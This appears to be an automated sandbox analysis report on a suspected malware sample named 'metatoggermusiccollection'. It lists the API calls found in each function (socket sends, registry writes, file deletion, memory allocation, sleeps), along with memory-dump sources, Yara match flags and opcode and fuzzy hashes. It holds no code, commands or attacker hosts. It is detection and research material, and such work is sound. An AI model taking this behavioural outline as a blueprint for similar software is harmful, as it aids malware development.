Uniqueness

Uniqueness Score: -1.00%

APIs
• __beginthreadex.LIBCMT ref: 02AE2046
• CloseHandle.KERNEL32(?,?,?,?,?,00000002,02ADA8BC,00000000), ref: 02AE2077
• ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02ADA8BC,00000000), ref: 02AE2085
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
Yara matches
Similarity
• API ID: CloseHandleResumeThread__beginthreadex
• String ID:
• API String ID: 1685284544-0
• Opcode ID: c46a8e9eddd73db4568e432fc77c847a566035c41c29ca011791622021cc3578
• Instruction ID: 9bee9d94754743e1b25f4367fcef0acfb3348db9ab8e1d842c66126bfa9dcf66
• Opcode Fuzzy Hash: c46a8e9eddd73db4568e432fc77c847a566035c41c29ca011791622021cc3578
• Instruction Fuzzy Hash: 88F04F712402016BEB209FA8DCC4B95B3A8AF48725F24056AF659D7294CBA1EC97DA90
Uniqueness

Uniqueness Score: -1.00%

APIs
• InterlockedIncrement.KERNEL32(02B0727C), ref: 02AD1ABA
• WSAStartup.WS2_32(00000002,00000000), ref: 02AD1ACB
• InterlockedExchange.KERNEL32(02B07280,00000000), ref: 02AD1AD7
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
Yara matches
Similarity
• API ID: Interlocked$ExchangeIncrementStartup
• String ID:
• API String ID: 1856147945-0
• Opcode ID: 6073f2baa91593d5e16d87d5b6c7de4e6b02c1b9d73459500b88e31b9836b69f
• Instruction ID: ad807aba76934d978ca8a0985632435adcc6c991d7127184152f82ec750d4a15
• Opcode Fuzzy Hash: 6073f2baa91593d5e16d87d5b6c7de4e6b02c1b9d73459500b88e31b9836b69f
• Instruction Fuzzy Hash: 05D05B319802045BE25166E06D4EA74F72CEB0A711F400691FDAAC05D0EF55E52485AA
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCommandLineW.KERNEL32 ref: 0040223C
• CommandLineToArgvW.SHELL32(00000000), ref: 0040B040
• GetLocalTime.KERNEL32(00409FB8), ref: 0040B942
Memory Dump Source
• Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
Similarity
• API ID: CommandLine$ArgvLocalTime
• String ID:
• API String ID: 3768950922-0
• Opcode ID: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
• Instruction ID: fe59c91cec6a1bbfec2f2a739a0674a99631b7336b4ea49b5c82aa235aaf9e13
• Opcode Fuzzy Hash: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
• Instruction Fuzzy Hash: F4D01273448012EBC2007BE19A0E99D37E5A64A3523224077F243F11E1CB3C44959B6F
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 02AD4BF2
  • Part of subcall function 02AD1BA7: __EH_prolog.LIBCMT ref: 02AD1BAC
  • Part of subcall function 02AD1BA7: RtlEnterCriticalSection.NTDLL ref: 02AD1BBC
  • Part of subcall function 02AD1BA7: RtlLeaveCriticalSection.NTDLL ref: 02AD1BEA
  • Part of subcall function 02AD1BA7: RtlEnterCriticalSection.NTDLL ref: 02AD1C13
  • Part of subcall function 02AD1BA7: RtlLeaveCriticalSection.NTDLL ref: 02AD1C56
  • Part of subcall function 02ADE02B: __EH_prolog.LIBCMT ref: 02ADE030
  • Part of subcall function 02ADE02B: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02ADE0AF
• InterlockedExchange.KERNEL32(?,00000000), ref: 02AD4CF2
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
Yara matches
Similarity
• API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
• String ID:
• API String ID: 1927618982-0
• Opcode ID: 094398cb353edf1f911d031edff51a0c978ab12fb9187405df543b1e6a1ea7d9
• Instruction ID: 4b4052f94a37464a72751f78ea55d23d52376896c50770da4d502ba242f4fdd7
• Opcode Fuzzy Hash: 094398cb353edf1f911d031edff51a0c978ab12fb9187405df543b1e6a1ea7d9
• Instruction Fuzzy Hash: 2D512771D04248DFDB15DFA8C984AEEBBB5FF08314F14816AE906AB351DB709A44CF61
Uniqueness

Uniqueness Score: -1.00%

APIs
• WSASetLastError.WS2_32(00000000), ref: 02AD2D47
• WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02AD2D5C
  • Part of subcall function 02ADA43C: WSAGetLastError.WS2_32(00000000,?,?,02AD2A51), ref: 02ADA44A
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Send
• String ID:
• API String ID: 1282938840-0
• Opcode ID: 2027d9f0fdd7eb2236bf3d1fc5a1f14ee848154e66ddedaae4738bcdbb19edfc
• Instruction ID: c2cf7224d66ee4221995e78c5a55281792071a2ec0a61a4dc98ddc1414ba91f4
• Opcode Fuzzy Hash: 2027d9f0fdd7eb2236bf3d1fc5a1f14ee848154e66ddedaae4738bcdbb19edfc
• Instruction Fuzzy Hash: 8A0171B5540209EFDB206F94898496BFAFDFB45364B20052EEC9A93200EF749D01CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
• WSASetLastError.WS2_32(00000000), ref: 02AD833A
• shutdown.WS2_32(?,00000002), ref: 02AD8343
Memory Dump Source
• Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
Yara matches
Similarity
• API ID: ErrorLastshutdown
• String ID:
• API String ID: 1920494066-0
• Opcode ID: 6fb7dffb08016b37e47dd84fc33a30cd09235af8e4a7bfebb139c66a7248a365
• Instruction ID: 4eeb5595dda298fdaea5ed5e638165ea53011095e43852483cea933ba45746eb
• Opcode Fuzzy Hash: 6fb7dffb08016b37e47dd84fc33a30cd09235af8e4a7bfebb139c66a7248a365
• Instruction Fuzzy Hash: 62F05471A44314CFDB10AF98D545B5AB7E5BF09320F00485DEDAA97380DF74AC11CBA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
  • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
• HeapDestroy.KERNEL32 ref: 004032AA
  • Part of subcall function 004032B7: HeapAlloc.KERNEL32(00000000,00000140,00403293,000003F8), ref: 004032C4
Memory Dump Source
• Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
Similarity
• API ID: Heap$AllocCreateDestroyVersion
• String ID:
• API String ID: 2507506473-0
• Opcode ID: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
• Instruction ID: bdc1dc1f8be9f1a85e4812a31df9c453441b6f572615afd11c7cbbe7009e603d
• Opcode Fuzzy Hash: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
• Instruction Fuzzy Hash: 08F0E5319043015AEF245F306E463263EA8DB50397F1184BFF401F82D1EB78C790950A
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegSetValueExA.KERNELBASE(?), ref: 0040BB89
• RegCloseKey.KERNELBASE(?), ref: 0040BBA1
Memory Dump Source
• Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
Similarity
• API ID: CloseValue
• String ID:
• API String ID: 3132538880-0
• Opcode ID: e5558a01befb399580d90c15d8e77e87dddf6eb678b6b853077a7300c8dcf38d
• Instruction ID: 3cbe291bb339146179499fcb751b8313bc5c9d0f62fdf094b2037c6fd71a0925
• Opcode Fuzzy Hash: e5558a01befb399580d90c15d8e77e87dddf6eb678b6b853077a7300c8dcf38d
• Instruction Fuzzy Hash: 47D0C971808002FFCB150B909E088293E79FB04350B200032E243708E4C7392462FAAF
Uniqueness

Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02AD511E
                                                                              • Part of subcall function 02AD3D7E: htons.WS2_32(?), ref: 02AD3DA2
                                                                              • Part of subcall function 02AD3D7E: htonl.WS2_32(00000000), ref: 02AD3DB9
                                                                              • Part of subcall function 02AD3D7E: htonl.WS2_32(00000000), ref: 02AD3DC0
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002B0A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B0A000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2b0a000_metatoggermusiccollection.jbxd

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02ADE8F9
                                                                              • Part of subcall function 02AD1A01: TlsGetValue.KERNEL32 ref: 02AD1A0A
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches

                                                                            APIs
                                                                            • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02AD33CC
                                                                              • Part of subcall function 02AD32AB: __EH_prolog.LIBCMT ref: 02AD32B0
                                                                              • Part of subcall function 02AD32AB: RtlEnterCriticalSection.NTDLL(?), ref: 02AD32C3
                                                                              • Part of subcall function 02AD32AB: RtlLeaveCriticalSection.NTDLL(?), ref: 02AD32EF
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches

                                                                            APIs
                                                                            • DeleteFileA.KERNELBASE(4660960D), ref: 02B6E376
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002B0A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B0A000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2b0a000_metatoggermusiccollection.jbxd

                                                                            APIs
                                                                            • LoadLibraryExA.KERNELBASE(?,00000000), ref: 0040B8D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02ADE489
                                                                              • Part of subcall function 02AD26DB: RtlEnterCriticalSection.NTDLL(?), ref: 02AD2706
                                                                              • Part of subcall function 02AD26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02AD272B
                                                                              • Part of subcall function 02AD26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02AF5A93), ref: 02AD2738
                                                                              • Part of subcall function 02AD26DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02AD2778
                                                                              • Part of subcall function 02AD26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02AD27D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches

                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 02ADE268
                                                                              • Part of subcall function 02AE3A8F: _malloc.LIBCMT ref: 02AE3AA7
                                                                              • Part of subcall function 02ADE484: __EH_prolog.LIBCMT ref: 02ADE489
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches

                                                                            APIs
                                                                              • Part of subcall function 02AE5B9A: __getptd_noexit.LIBCMT ref: 02AE5B9B
                                                                              • Part of subcall function 02AE5B9A: __amsg_exit.LIBCMT ref: 02AE5BA8
                                                                              • Part of subcall function 02AE33D6: __getptd_noexit.LIBCMT ref: 02AE33DA
                                                                              • Part of subcall function 02AE33D6: __freeptd.LIBCMT ref: 02AE33F4
                                                                              • Part of subcall function 02AE33D6: RtlExitUserThread.NTDLL(?,00000000,?,02AE33B6,00000000), ref: 02AE33FD
                                                                            • __XcptFilter.LIBCMT ref: 02AE33C2
                                                                              • Part of subcall function 02AE8CD4: __getptd_noexit.LIBCMT ref: 02AE8CD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches

                                                                            APIs
                                                                            • LoadLibraryExA.KERNELBASE(?,00000000), ref: 0040B8D6
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd

                                                                            APIs
                                                                            • RegCreateKeyExA.KERNELBASE ref: 0040B00D
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002B0A000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B0A000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2b0a000_metatoggermusiccollection.jbxd

                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040BB0F
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd

                                                                            APIs
                                                                            • RegCloseKey.KERNELBASE(?), ref: 0040BBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 4208be6c401ace8eaf57d9faaff6df1abccb720293123bf60b5afa5c9f998a5b
                                                                            • Instruction ID: 7a8fb3575aad36e99e01433973275fcd838bbbcd725035783ab06971788b140c
                                                                            • Opcode Fuzzy Hash: 4208be6c401ace8eaf57d9faaff6df1abccb720293123bf60b5afa5c9f998a5b
                                                                            • Instruction Fuzzy Hash: 5D017B72849596DBC7228F619D8CAA53F20EB05300B2C47FAE581769A2C33AD917D7CD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Sleep.KERNELBASE(000003E8), ref: 0040B673
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 4923c56613507f6154e6695a1a0a79be905ca74f5fc4bb1a8d63dae53b35cfd4
                                                                            • Instruction ID: c46616b9988c65e90fc05240c7557c229c01b71e50158476c3ddc31f6f3b184e
                                                                            • Opcode Fuzzy Hash: 4923c56613507f6154e6695a1a0a79be905ca74f5fc4bb1a8d63dae53b35cfd4
                                                                            • Instruction Fuzzy Hash: 22017D761987109DC721CA384D46D923B68EE22700B69096BF142BF1E2D33B950BD6CF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 02AE1550: OpenEventA.KERNEL32(00100002,00000000,00000000,3156A85A), ref: 02AE15F0
                                                                              • Part of subcall function 02AE1550: CloseHandle.KERNEL32(00000000), ref: 02AE1605
                                                                              • Part of subcall function 02AE1550: ResetEvent.KERNEL32(00000000,3156A85A), ref: 02AE160F
                                                                              • Part of subcall function 02AE1550: CloseHandle.KERNEL32(00000000,3156A85A), ref: 02AE1644
                                                                            • TlsSetValue.KERNEL32(00000025,?), ref: 02AE20EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseEventHandle$OpenResetValue
                                                                            • String ID:
                                                                            • API String ID: 1556185888-0
                                                                            • Opcode ID: 34e67e3f12a904ee02a4c0a836bde09c0d092ea3c3fa11d6efc1cf0b174418ec
                                                                            • Instruction ID: 4ce13313124d8e8f8d42e18ea1cd6befaae05c8dd8d17938add9c824b5815ada
                                                                            • Opcode Fuzzy Hash: 34e67e3f12a904ee02a4c0a836bde09c0d092ea3c3fa11d6efc1cf0b174418ec
                                                                            • Instruction Fuzzy Hash: EB018471A80214ABE710DF58DC45F5EBBF8FB05760F104756F42AD3280DB759D108AA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 1586166983-0
                                                                            • Opcode ID: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                            • Instruction ID: b9dd472658aa79e8713cc1c43643f3a09ee23d5b7ec078f99577b19effab2280
                                                                            • Opcode Fuzzy Hash: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                            • Instruction Fuzzy Hash: 54F09A3260C2538EC74216656A082B67BA0AA51710B38847B9C87B51D2DBBC485376AF
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNELBASE(?), ref: 0040B2FB
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 18c128e7e1d3a70a9118cf2a5e811f5c9c954107df949b2efcfa9b5db2156fc9
                                                                            • Instruction ID: 30eba2562c68e96c98e1aa31e98657024e3942590acf667e384b09b50b6edfb8
                                                                            • Opcode Fuzzy Hash: 18c128e7e1d3a70a9118cf2a5e811f5c9c954107df949b2efcfa9b5db2156fc9
                                                                            • Instruction Fuzzy Hash: 0BC08C31100901E7C7000B348E0C181B728FF007003260132EC03709A0C37E542DAAAD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 7555949166ef3385efc278390852ec46746e317434f07fbea60302d659f1b0da
                                                                            • Instruction ID: 130aa393355d1d3f730376283a7cbe41ada4335551948cec256614a457e6477e
                                                                            • Opcode Fuzzy Hash: 7555949166ef3385efc278390852ec46746e317434f07fbea60302d659f1b0da
                                                                            • Instruction Fuzzy Hash: 43C08C30805940DBD2164B306E08B143B30E721700F200964E24320CE1833A6025D609
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Sleep.KERNELBASE(000003E8), ref: 0040B673
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 2f3bbf81509a6403ce4eb6566e4c2682b327bd7fda14c88d04de4b44162c8b52
                                                                            • Instruction ID: daca3ffbd5ff764758662f534c55e9e56749cc2f8a70cc823d56b72693b939bd
                                                                            • Opcode Fuzzy Hash: 2f3bbf81509a6403ce4eb6566e4c2682b327bd7fda14c88d04de4b44162c8b52
                                                                            • Instruction Fuzzy Hash: 3BB092305C8B01FEE10107A09E59F386621E720B00F220623A703780E08BBA0663BA8F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • Sleep.KERNELBASE(000003E8), ref: 0040B673
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3215362134.0000000000409000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3215362134.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_metatoggermusiccollection.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 00bf01a9b72d648d1cebd4848209a3c99be8b6c7cbdd3909c15e8f7d0f3832f1
                                                                            • Instruction ID: a3b9e5ac81abcb523932f8946054f8d2fd83f5673244a20f1dfd6dc4be3b2ef3
                                                                            • Opcode Fuzzy Hash: 00bf01a9b72d648d1cebd4848209a3c99be8b6c7cbdd3909c15e8f7d0f3832f1
                                                                            • Instruction Fuzzy Hash: 4EB092B1488A01AAE6010B905A2EB207622F720B00F120A22E303380E143BA0222ABCE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02AE08E2
                                                                            • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02AE08EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorFormatLastMessage
                                                                            • String ID:
                                                                            • API String ID: 3479602957-0
                                                                            • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                            • Instruction ID: 12ac5ce72775eec7eeec92a5142f6ccb0213bab1bf9da6b5ab44ea39ce37071c
                                                                            • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                            • Instruction Fuzzy Hash: E8F03030208341DFEB14CE25C891B2EB7E4ABAD754F50092CF596A2191D7B0D1468B56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,02AE4DD6,?,?,?,00000001), ref: 02AE946D
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 02AE9476
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AD1000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_2ad1000_metatoggermusiccollection.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            • Opcode ID: ad84986ed02134928f7f3f518ec18499414b40b9105e6f7489909e10421b86d3
                                                                            • Instruction ID: b45f8ac4a59a8cdbb446b807b3a8168e52353d1a3f03950b26020aa8b33967c5
                                                                            • Opcode Fuzzy Hash: ad84986ed02134928f7f3f518ec18499414b40b9105e6f7489909e10421b86d3
                                                                            • Instruction Fuzzy Hash: EAB09231484208FBCB812BD1EC09B99BF28EF04762F004810F70E448508FA694229AA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • RtlDecodePointer.NTDLL(?), ref: 02AE827A
                                                                            • _free.LIBCMT ref: 02AE8293
                                                                              • Part of subcall function 02AE2EB4: HeapFree.KERNEL32(00000000,00000000,?,02AE5C12,00000000,00000104,75920A60), ref: 02AE2EC8
                                                                              • Part of subcall function 02AE2EB4: GetLastError.KERNEL32(00000000,?,02AE5C12,00000000,00000104,75920A60), ref: 02AE2EDA
                                                                            • _free.LIBCMT ref: 02AE82A6
                                                                            • _free.LIBCMT ref: 02AE82C4
                                                                            • _free.LIBCMT ref: 02AE82D6
                                                                            • _free.LIBCMT ref: 02AE82E7
                                                                            • _free.LIBCMT ref: 02AE82F2
                                                                            • _free.LIBCMT ref: 02AE8316
